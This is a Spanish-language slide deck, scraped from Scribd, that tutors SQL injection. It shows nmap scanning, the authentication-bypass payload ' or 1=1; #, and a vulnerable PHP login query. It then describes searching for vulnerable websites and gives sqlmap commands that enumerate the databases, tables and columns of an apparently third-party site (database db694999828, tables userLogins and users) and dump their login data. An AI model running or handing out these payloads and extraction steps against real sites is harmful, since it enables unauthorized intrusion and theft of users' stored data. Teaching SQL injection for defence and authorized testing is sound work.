0% encontró este documento útil (0 votos)
88 vistas20 páginas

SQL Injection

La SQL injection permite a un atacante inyectar código SQL malicioso en una aplicación vulnerable para manipular una base de datos sin autorización. Se puede usar para recopilar información de la base de datos como los nombres de tablas y columnas e incluso extraer datos. Herramientas como sqlmap automatizan el proceso de detección de vulnerabilidades de SQL injection y extracción de datos.
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PPTX, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
88 vistas20 páginas

SQL Injection

La SQL injection permite a un atacante inyectar código SQL malicioso en una aplicación vulnerable para manipular una base de datos sin autorización. Se puede usar para recopilar información de la base de datos como los nombres de tablas y columnas e incluso extraer datos. Herramientas como sqlmap automatizan el proceso de detección de vulnerabilidades de SQL injection y extracción de datos.
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PPTX, PDF, TXT o lee en línea desde Scribd

• Sql Injection ó Inyección SQL es una

¿Que es SQL vulnerabilidad que permite al atacante


enviar o “inyectar” instrucciones SQL de
Injection? forma maliciosa y malintencionada dentro
del código SQL programado.

¿Para que se usa • El principal propósito es la manipulación


de bases de datos de forma no
SQL Injection? autorizada.
Recolección de información
• Nmap es una aplicación multiplataforma usada para explorar redes y
obtener información acerca de los servicios, sistemas operativos y
vulnerabilidades derivadas de la conjunción de éstos.
• Uso del commando -A
Uso del comando
–T(0-5)
Paso 1) Recolección de
Información

• Elegir la pagina para realizar el


ataque.
• Elegiremos una pagina interna para
no afectar a nadie.

• Ya tenemos su Link:
[Link]
Analizaremos que podemos saber del servidor

Con este escaneo nos damos cuenta que el


servidor utiliza la base de datos MYSQL. Así
Eliminamos el hackeo a bases de Oracle,
MariaDB etc.
Verificamos que la pagina sea vulnerable a
sql injection
Comando para
ingresar

• ‘ or 1=1; #

• Con este comando podemos


engañar a la consulta para
validar el usuario.
Como funciona el login de sql injection
• $sql= "Select * from usuarios where nombre=‘” .$usuario. "' and password='".$pass.“’”;

• Select * from usuarios where nombre=' Sistemas ' and password=‘S1st3m4s’; Correcta

• Select * from usuarios where nombre= ' ' or 1=1; # ' and password=‘S1st3m4s’; Sql Injection

• Select * from usuarios where nombre= ' ' or 1=1 Sql Injection
Para encontrar paginas
web vulnerables a SQL
INJECTION Podemos
hacer esta busqueda.
Seleccionamos una pagina
para poder extrar la base de
datos con sqlmap

[Link]
El comando siguiente se usa para conocer el nombre de las bases de
datos que usa la pagina.
[Link] –u [Link] --dbs
[Link] –u [Link] --dbs
El comando siguiente se usa
para conocer el nombre de
las tablas de la datos

•[Link] -u [Link] -D
tubase –tables

•[Link] –u
[Link] -D
db694999828 –tables
Ahora que ya sabemos cuales son
las bases de datos tenemos que
ver cuales son sus columnas

• [Link] -u
[Link] -D
db694999828 -T userLogins –columns

• [Link] –u
[Link] -D
db694999828 -T users –columns
Para extraer los datos de la tabla serLogins.

[Link] -u [Link] -D db694999828 -T userLogins -C timestamp,access,guid,ID --dump


Reto
• [Link]
Mas Información
Canal de Youtube OHCS
• [Link]

• Pagina para extraer Base de Datos


• [Link]
[Link]

También podría gustarte